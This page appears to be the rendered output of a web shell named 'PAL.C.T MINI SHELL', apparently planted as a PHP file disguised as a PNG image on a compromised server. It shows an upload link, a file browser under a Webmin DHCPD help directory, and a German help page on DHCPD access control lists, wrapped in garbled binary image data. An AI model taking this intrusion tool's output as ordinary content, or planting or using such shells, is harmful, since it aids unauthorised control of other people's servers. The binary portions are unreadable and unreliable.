php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/dhcpd/help/
upload
files >> //usr/libexec/webmin/dhcpd/help/acl.de.auto.html

<!doctype html public "-//w3c//dtd html 4.0 transitional//en"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="GENERATOR" content="Mozilla/4.72 [en] (X11; U; Linux 2.2.14-6.1.1 i686) [Netscape]"></head><body><center><h1> DHCPD-ACL-Subsystem </h1></center><h3> ZIELE: </h3> Das Hauptziel des acl-Subsystems besteht darin, einen leistungsstarken, flexiblen und erweiterbaren Mechanismus für die Zugriffskontrolle verschiedener Objekte in der dhcpd-Konfiguration bereitzustellen. Diese Objekte sind gemeinsam genutzte Netzwerke, Subnetze, Gruppen von Hosts und Hosts. <br> Mit dem acl-Subsystem können Sie auch einige andere Funktionen steuern, z. B. eindeutige Objektnamen, Anwenden geänderter Konfigurationen, Anzeigen und Löschen von DHCP-Funktionen. <h3> KONZEPTE: </h3> Dhcpd-Konfigurationsdatei können wir als Baumstruktur anzeigen. Jeder Knoten dieses Baums repräsentiert eine Konfiguration verschiedener DHCP-Objekte (Abb. 0). <p> Das Acl-Subsystem verfügt über zwei Berechtigungsstufen: <ul><li> global: lesen, schreiben, erstellen; </li><li> pro Objekt: lesen, schreiben. </li></ul> Globale Berechtigungen sind für jeden Objekttyp (Hosts, Gruppen, Subnetze, gemeinsam genutzte Netzwerke) vorhanden und steuern Vorgänge mit einem gesamten Objektsatz eines bestimmten Typs. <br> Global erstellen <br> Globales Lesen <br> Globales Schreiben <br> Pro-Objekt-Berechtigungen bieten Ihnen eine flexiblere Möglichkeit zur Zugriffskontrolle. Pro-Objekt-Berechtigungen acl existiert für jedes Objekt einzelnes Objekt. Heutzutage werden nur Hosts und Subnetze pro Objekt aktiviert. <br> Pro Objekt gelesen <br> Pro Objekt schreiben <br> Das Acl-Subsystem kann in 4 verschiedenen Sicherheitsstufen (oder Modi) betrieben werden. <br><img SRC="ctree0.gif" alt="DHCP-Konfigurationsbaum, Sicherheitsstufe 0, SubnetX-Berechtigungen überprüfen" height=229 width=314><br><p><img SRC="ctree1.gif" alt="DHCP-Konfigurationsbaum, Sicherheitsstufe 1, SubnetX-Berechtigungen prüfen" height=229 width=314><p><img SRC="ctree2.gif" alt="DHCPD-Konfigurationsbaum, Sicherheitsstufe 2, SubnetX-Berechtigungen überprüfen" height=229 width=314><p><img SRC="ctree3.gif" alt="DHCP-Konfigurationsbaum, Sicherheitsstufe 3, SubnetX-Berechtigungen überprüfen" height=229 width=314><h3> BENUTZERHINWEISE: </h3><h3> ANMERKUNGEN DES ENTWICKLERS: </h3></body></html>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`